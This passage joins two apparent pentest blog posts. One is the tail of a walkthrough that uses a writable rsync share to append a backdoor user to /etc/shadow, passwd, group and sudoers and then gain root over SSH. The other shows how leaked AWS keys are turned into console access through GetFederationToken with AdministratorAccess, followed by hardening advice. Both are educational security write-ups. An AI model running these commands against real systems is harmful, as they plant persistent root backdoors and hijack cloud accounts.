  3. Download /etc/shadow (and back it up).
  4. Append the new user entry to the end of /etc/shadow.
  5. Upload / overwrite the existing /etc/shadow file.

Note: Make sure to create a new user that doesn’t already exist on the system. 😉

Create Encrypted Password:

openssl passwd -crypt password123
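Note: The -crypt option produces a weak DES-based hash; on systems with a newer OpenSSL, you can generate a stronger SHA-512 hash instead (where the -6 flag is supported):

openssl passwd -6 password123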

Add New User Entry to /etc/shadow:

rsync -R 192.168.1.171::files/etc/shadow .
cp ./etc/shadow ../backup
echo "myuser:MjHKz4C0Z0VCI:17861:0:99999:7:::" >> ./etc/shadow
rsync ./etc/shadow 192.168.1.171::files/etc/

Create Passwd File Entry
The /etc/passwd file is used to keep track of registered users that have access to the system. It does not contain encrypted passwords. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/passwd. (and back it up so you can restore state later)
  3. Append the new user entry to the end of passwd.
  4. Upload / Overwrite the existing /etc/passwd

Note: Feel free to change the UID, but make sure it matches the value set in the /etc/group file. 🙂 In this case the UID/GID are both 1021.

Add New User Entry to /etc/passwd:

rsync -R 192.168.1.171::files/etc/passwd .
cp ./etc/passwd ../backup
echo "myuser:x:1021:1021::/home/myuser:/bin/bash" >> ./etc/passwd
rsync ./etc/passwd 192.168.1.171::files/etc/

Create the Group File Entry
The /etc/group file is used to keep track of registered group information on the system. It does not contain encrypted passwords. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/group. (and backup, just in case)
  3. Append the new user entry to the end of group.
  4. Upload / Overwrite the existing /etc/group file.

Note: Feel free to change the GID, but make sure it matches the value set in the /etc/passwd file. 🙂 In this case the UID/GID are both 1021.

Add New User Entry to /etc/group:

rsync -R 192.168.1.171::files/etc/group .
cp ./etc/group ../backup
echo "myuser:x:1021:" >> ./etc/group
rsync ./etc/group 192.168.1.171::files/etc/

Create Sudoers File Entry
The /etc/sudoers file contains a list of users that are allowed to run commands as root using the sudo command. It can only be read by root. We are going to modify it to allow the new user to execute any command through sudo.

To inject an entry via Rsync you'll have to:

  1. Create the user entry to inject.
  2. Download /etc/sudoers. (and backup, just in case)
  3. Append the new user entry to the end of sudoers.
  4. Upload / Overwrite the existing /etc/sudoers file.

Add New User Entry to /etc/sudoers:

rsync -R 192.168.1.171::files/etc/sudoers .
cp ./etc/sudoers ../backup
echo "myuser ALL=(ALL) NOPASSWD:ALL" >> ./etc/sudoers   
rsync ./etc/sudoers 192.168.1.171::files/etc/

Now you can simply log into the server via SSH using your newly created user and run sudo sh to get root!
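For example, below is a hedged sketch of that final step:

ssh myuser@192.168.1.171
sudo sh
id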

Attacking Rsync Demo Video

Below is a video created in a lab environment that shows the process of identifying and exploiting an insecurely configured Rsync server to gain a root shell. While it may seem too simple to be true, it is based on configurations exploited during real penetration tests.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerability that provided write access.  While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems.   Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured Rsync servers.  Good luck and hack responsibly!

The next blog in the series focuses on NFS and setuid binaries, it can be found here.


Gaining AWS Console Access via API Keys

For adversarial scenarios, AWS console access is better than the APIs. We’ll walk you through our research process here, and release a new tool we’ve built!

When there’s a will…

We’re frequently asked by clients to test applications, networks and/or infrastructure hosted on Amazon Web Services (AWS). As a part of these assessments, we’ll oftentimes locate active IAM credentials in a variety of ways. These credentials allow for the holder to perform privileged actions in AWS services within an AWS account.

These credentials come in two forms, both of which work with the AWS CLI:

  • Permanent credentials
    Usually representing individual IAM users, these contain an access key (which generally starts with AKIA) and secret key.
  • Temporary credentials
Generally obtained by assuming an IAM role, these also contain a session token (and an access key starting with ASIA). Generally speaking, these credentials are used by your applications or users with the AWS CLI or SDK to integrate with different AWS services.

However, neither of these is ideal for a penetration test. The AWS CLI often requires multiple calls to obtain relevant data, and the SDK would require developing tools specific to an attack scenario or vulnerability.

Recently, we had a perfect example of this. While performing a cloud penetration test with Karl Fosaaen, we located some hardcoded AWS credentials within a piece of management infrastructure in a client’s account. These credentials worked great with AWS APIs, and were really useful for tools like ScoutSuite and Pacu. Both of these tools utilize the AWS APIs/CLIs/SDKs, which generally have more power than the console.

However, it’s easy to forget specific CLI syntax for even the simplest of commands. The below example shows a pretty simple recon activity we might perform – describing running EC2 instances. At the top, we see the AWS console interface’s easy-to-use filter option. On the bottom, we see my attempts to remember the specific filter name needed.

[Screenshot: the AWS console's filter UI versus guessing AWS CLI filter names]
Now, was it “instance-state,” “state,” “status…?”

Rather than trudge through the AWS CLI syntax, we investigated methods to gain access to the AWS console.

…there’s a way.

Fortunately, AWS has such a mechanism for gaining access to the AWS console using API credentials – the AWS federation endpoint.

On the Topic of Federation

AWS has written a handful of blogs (1, 2) on the topic, and has a short instruction guide on its use. The long and the short of it is that it allows for the conversion of certain types of temporary credentials into console federation tokens. These tokens can be included in a URL that grants access to the AWS console. All that's needed is a set of calls to the federation endpoint, and you're given a magic token that allows direct access to the AWS console.

There’s a couple of caveats, though – you need temporary credentials. The most common mechanism to obtain these credentials is with a call to the AssumeRole method in the STS service – as the name suggests, this allows a caller to gain access to an IAM role with an appropriate role trust policy.

However, sts:AssumeRole is generally regarded as a “dangerous” permission, in that it can be used to significantly elevate privilege – for that reason, it’s a permission we recommend clients avoid granting unless necessary. Regardless, we’d also need to know of a role we can assume, which may or may not be available. There are other common ways to obtain credentials – the most common being sts:GetSessionToken, which is often used to grant temporary credentials for a user based on a multi-factor authentication mechanism – however, credentials issued from this endpoint do not work with the federation endpoint, and will return an error when attempting to use them.

D’oh! Foiled again. GetSessionToken credentials won’t work here, it looks like.

Permanently Temporary

Lucky for us, there's another available option. While generally designed for IDP authentication from outside an AWS account, sts:GetFederationToken fits our needs quite nicely. This appears to be an older function of the AWS APIs, predating newer authentication features (such as AWS SSO, AWS Cognito, and Web Identity/SAML federation). The method is designed to be called with a set of permanent IAM credentials (e.g., by an on-premises application server) and federate a non-IAM user into AWS by providing temporary access credentials. The method allows for specifying the permissions of the new user via one or more policies – permissions are taken as the intersection of the calling IAM user's permissions and the policies supplied in the sts:GetFederationToken call.

In our case, we're not concerned about reducing our access, so we can supply the built-in AWS-managed AdministratorAccess policy for the fullest set of effective permissions. To make our lives easier, this API method is considered non-dangerous, and is included in the AWS-managed ReadOnlyAccess policy. This is in line with our own use here – we're not escalating access, just making it easier to use. Still, console access can be used to hunt for further privilege escalation opportunities.
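As a rough sketch, the call looks something like this with the AWS CLI (assuming a CLI version recent enough to support --policy-arns; the session name is arbitrary):

aws sts get-federation-token \
  --name consoler \
  --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess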

With these temporary credentials in hand, we can call the federation service for our magic console sign-in link. In the response, we get a URL for obtaining access to the AWS console. No more copy/pasting from a window!
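For the curious, below is a minimal bash sketch of that two-step flow against the federation endpoint. It assumes the temporary credentials are exported in the standard AWS environment variables and that jq is installed:

# Package the temporary credentials as the JSON session blob the endpoint expects
session=$(jq -n --arg id "$AWS_ACCESS_KEY_ID" --arg key "$AWS_SECRET_ACCESS_KEY" --arg tok "$AWS_SESSION_TOKEN" \
  '{sessionId: $id, sessionKey: $key, sessionToken: $tok}')

# Exchange the credentials for a console sign-in token
token=$(curl -sG "https://signin.aws.amazon.com/federation" \
  --data-urlencode "Action=getSigninToken" \
  --data-urlencode "Session=$session" | jq -r .SigninToken)

# Build the console sign-in URL
echo "https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$token"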

The right tool for the right job – AWS Consoler

To make the instrumentation process a bit easier, I’ve developed a tool for gaining access to the AWS console, which I’ve named “AWS Consoler” (creative, I know…). Check the tool out (and full usage instructions) in the GitHub repo. As with all of our open-source tools, we welcome pull requests!

This tool has a variety of features, and deep integrations with AWS's SDK for Python (boto3). Credentials can be passed on the command line, as one might expect. However, because we're powering this with boto3, they can also be taken from AWS CLI named profiles, via boto3's built-in logic for environment variables, or even the Instance Metadata Service (when running on AWS compute resources) – boto3 does all the heavy lifting for us. Pass in your credentials, and you'll get a sign-in link for the AWS console in the region of your choice. If you hate copy/pasting as much as I do, it can also open that link in your system's default browser.

Here’s some example usage we would expect would work for most folks.

 
$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED]
2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments...
2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic.
2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established.
2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session.
2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established.
2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler.
2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated!
https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED]
 

Prevention

If you’re a developer or engineer working on an AWS environment, you might be wondering “how do I prevent this?” Fortunately, this type of access is relatively-easy to prevent, and falls in to our methodology for securing cloud environments:

Scope down permissions to the lowest-possible set

When setting up IAM permissions for a user, role, or other IAM principal, only grant the permissions which are absolutely necessary for normal operation. Additional permissions like sts:GetFederationToken, sts:AssumeRole, and other STS operations pose a risk towards privilege escalation, and can be dangerous if applied incorrectly.

If you’re using a policy managed by AWS, we’d recommend verifying the policy in-use doesn’t include permissions that are not needed for normal operation. Replacing AWS-managed policies with customer-managed policies is one of our suggestions for scenarios where the AWS-managed policy doesn’t exactly match the specific requirements for a IAM user or role’s purpose.

This is a really great example of what not to do.

Don’t hard-code credentials in your environment

The initial entry point for this escalation requires obtaining AWS credentials. Oftentimes, we'll find these hard-coded into an environment in some fashion. We'd recommend transitioning to using execution roles for your compute resources in AWS. Implementations vary per compute resource – for example, EC2 has instance profiles, ECS has task roles, and Lambda has execution roles. By doing so, AWS SDKs can automatically obtain short-lived credentials for authenticating to AWS services.

Restrict access to the EC2 Instance Metadata Service

The EC2 Instance Metadata Service is a web service running in all EC2 environments at a pre-defined IP address. Normally, this service is used by compute resources to gain information about the environment to which they were deployed. This information usually includes things like the following:

  • VPC configuration
  • EC2 userdata
  • Tags associated with the EC2 instance
  • Temporary IAM credentials for execution roles

Ensure you’ve restricted access to this service from resources in your application environment, especially if processing user data on said resources. In general, you’d restrict this using iptables rules, Windows Firewall rules or other routing rules on your compute resources. In addition, you can restrict this can be set at instance launch time.

New features in EC2 allow for completely disabling the Instance Metadata Service if it's not being used for anything.
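For example, below is a hedged sketch using the AWS CLI, either requiring IMDSv2 session tokens or disabling the endpoint entirely (the instance ID is a placeholder):

aws ec2 modify-instance-metadata-options --instance-id i-0123456789abcdef0 --http-tokens required
aws ec2 modify-instance-metadata-options --instance-id i-0123456789abcdef0 --http-endpoint disabled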

Note that, if using ECS, an additional metadata endpoint exists for task-specific metadata – the ECS Task Metadata Service. Make sure you restrict access to this as well.

Set condition keys on IAM policies for execution roles

When using execution roles with your compute resources, consider restricting the policy to be only usable by that specific resource. This can be accomplished by a number of condition keys within the IAM policy, including ones restricting the VPC and/or IP address of the caller.
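Below is a hedged sketch of what such a condition might look like in a policy (the VPC ID is a placeholder, and note that aws:SourceVpc only evaluates for requests that traverse a VPC endpoint):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "Action": "*",
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:SourceVpc": "vpc-0123456789abcdef0"
        }
      }
    }
  ]
}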

Conclusion

With this blog, and AWS Consoler, we hope to make the lives of red-teamers, blue-teamers, bug bounty searchers, and other individuals in the security sphere easier. Feel free to let us know how you’re using AWS Consoler via the comments below, or on your favorite social networks. You can find me on both LinkedIn and Twitter.
